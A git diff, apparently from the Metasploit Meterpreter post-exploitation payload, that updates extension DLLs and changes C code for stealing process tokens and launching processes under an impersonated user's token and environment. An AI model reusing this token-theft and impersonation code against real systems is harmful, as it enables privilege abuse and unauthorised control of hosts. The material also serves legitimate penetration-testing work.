diff --git a/data/meterpreter/elevator.dll b/data/meterpreter/elevator.dll index 92adc03f07..f3645b5611 100644 Binary files a/data/meterpreter/elevator.dll and b/data/meterpreter/elevator.dll differ diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll index 3366b65c5d..09fcee806a 100644 Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ diff --git a/data/meterpreter/ext_server_espia.dll b/data/meterpreter/ext_server_espia.dll index d24b4ef2b7..519e022b32 100644 Binary files a/data/meterpreter/ext_server_espia.dll and b/data/meterpreter/ext_server_espia.dll differ diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll index 955f88baef..3c3918d92e 100644 Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ diff --git a/data/meterpreter/ext_server_incognito.dll b/data/meterpreter/ext_server_incognito.dll index 9077d546ed..39416953ea 100755 Binary files a/data/meterpreter/ext_server_incognito.dll and b/data/meterpreter/ext_server_incognito.dll differ diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll index a4df172081..030dcb0e95 100644 Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ diff --git a/data/meterpreter/ext_server_priv.dll b/data/meterpreter/ext_server_priv.dll index 27a1df1a13..d5171f6074 100755 Binary files a/data/meterpreter/ext_server_priv.dll and b/data/meterpreter/ext_server_priv.dll differ diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll index 11616b8f99..410134cf79 100644 Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ diff --git a/data/meterpreter/ext_server_railgun.dll b/data/meterpreter/ext_server_railgun.dll index b319241bb7..7908a561bc 100755 Binary files a/data/meterpreter/ext_server_railgun.dll and b/data/meterpreter/ext_server_railgun.dll differ diff --git a/data/meterpreter/ext_server_sniffer.dll b/data/meterpreter/ext_server_sniffer.dll index 1dd2cf55bd..06b347e128 100644 Binary files a/data/meterpreter/ext_server_sniffer.dll and b/data/meterpreter/ext_server_sniffer.dll differ diff --git a/data/meterpreter/ext_server_stdapi.dll b/data/meterpreter/ext_server_stdapi.dll index a7b2f4d3b0..06ab508ccb 100755 Binary files a/data/meterpreter/ext_server_stdapi.dll and b/data/meterpreter/ext_server_stdapi.dll differ diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll index 2b79020dc9..062bd45685 100644 Binary files a/data/meterpreter/ext_server_stdapi.x64.dll and b/data/meterpreter/ext_server_stdapi.x64.dll differ diff --git a/data/meterpreter/metsrv.dll b/data/meterpreter/metsrv.dll index ac4aa10623..cdbe467b9e 100755 Binary files a/data/meterpreter/metsrv.dll and b/data/meterpreter/metsrv.dll differ diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll index 129af2aeed..1860e84c37 100644 Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ diff --git a/data/meterpreter/screenshot.dll b/data/meterpreter/screenshot.dll index ccc6a9252c..bfb8b04137 100644 Binary files a/data/meterpreter/screenshot.dll and b/data/meterpreter/screenshot.dll differ diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll index 49ef867896..1b24fa4f30 100644 Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ diff --git a/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c b/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c index 3de5c2023d..450686a917 100644 --- a/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c +++ b/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c @@ -219,7 +219,7 @@ DWORD request_sys_config_steal_token(Remote *remote, Packet *packet) break; } - if(! OpenProcessToken(handle, TOKEN_QUERY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE, &token)){ + if(! OpenProcessToken(handle, TOKEN_ALL_ACCESS, &token)){ res = GetLastError(); dprintf("[STEAL-TOKEN] Failed to open process token for %d (%u)", pid, res); break; diff --git a/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c b/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c index 1366cc1ccd..9a2154e960 100644 --- a/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c +++ b/external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c @@ -3,6 +3,10 @@ #include "./../session.h" #include "in-mem-exe.h" /* include skapetastic in-mem exe exec */ + +typedef BOOL (STDMETHODCALLTYPE FAR * LPFNCREATEENVIRONMENTBLOCK)( LPVOID *lpEnvironment, HANDLE hToken, BOOL bInherit ); +typedef BOOL (STDMETHODCALLTYPE FAR * LPFNDESTROYENVIRONMENTBLOCK) ( LPVOID lpEnvironment ); + /* * Attaches to the supplied process identifier. If no process identifier is * supplied, the handle for the current process is returned to the requestor. @@ -95,6 +99,10 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet) HANDLE token, pToken; char * cpDesktop = NULL; DWORD session = 0; + LPVOID pEnvironment = NULL; + LPFNCREATEENVIRONMENTBLOCK lpfnCreateEnvironmentBlock = NULL; + LPFNDESTROYENVIRONMENTBLOCK lpfnDestroyEnvironmentBlock = NULL; + HMODULE hUserEnvLib = NULL; dprintf( "[PROCESS] request_sys_process_execute" ); @@ -246,10 +254,13 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet) if (flags & PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN) { - // If there is a thread token use that, otherwise use current process token - if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token)) + // If there is an impersonated token stored, use that one first, otherwise + // try to grab the current thread token, then the process token + if (remote->hThreadToken) + token = remote->hThreadToken; + else if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token)) OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token); - + // Duplicate to make primary token (try delegation first) if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken)) if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken)) @@ -258,12 +269,26 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet) break; } + hUserEnvLib = LoadLibrary("userenv.dll"); + if ( NULL != hUserEnvLib ) { + lpfnCreateEnvironmentBlock = (LPFNCREATEENVIRONMENTBLOCK) GetProcAddress( hUserEnvLib, "CreateEnvironmentBlock" ); + lpfnDestroyEnvironmentBlock = (LPFNDESTROYENVIRONMENTBLOCK) GetProcAddress( hUserEnvLib, "DestroyEnvironmentBlock" ); + if (lpfnCreateEnvironmentBlock && lpfnCreateEnvironmentBlock( &pEnvironment, pToken, FALSE)) { + createFlags |= CREATE_UNICODE_ENVIRONMENT; + } else { + pEnvironment = NULL; + } + } + // Try to execute the process with duplicated token - if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, NULL, NULL, &si, &pi)) + if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi)) { result = GetLastError(); break; } + + if (lpfnDestroyEnvironmentBlock && (NULL != pEnvironment)) lpfnDestroyEnvironmentBlock(&pEnvironment); + if ( NULL != hUserEnvLib ) FreeLibrary( hUserEnvLib ); } else if( flags & PROCESS_EXECUTE_FLAG_SESSION ) {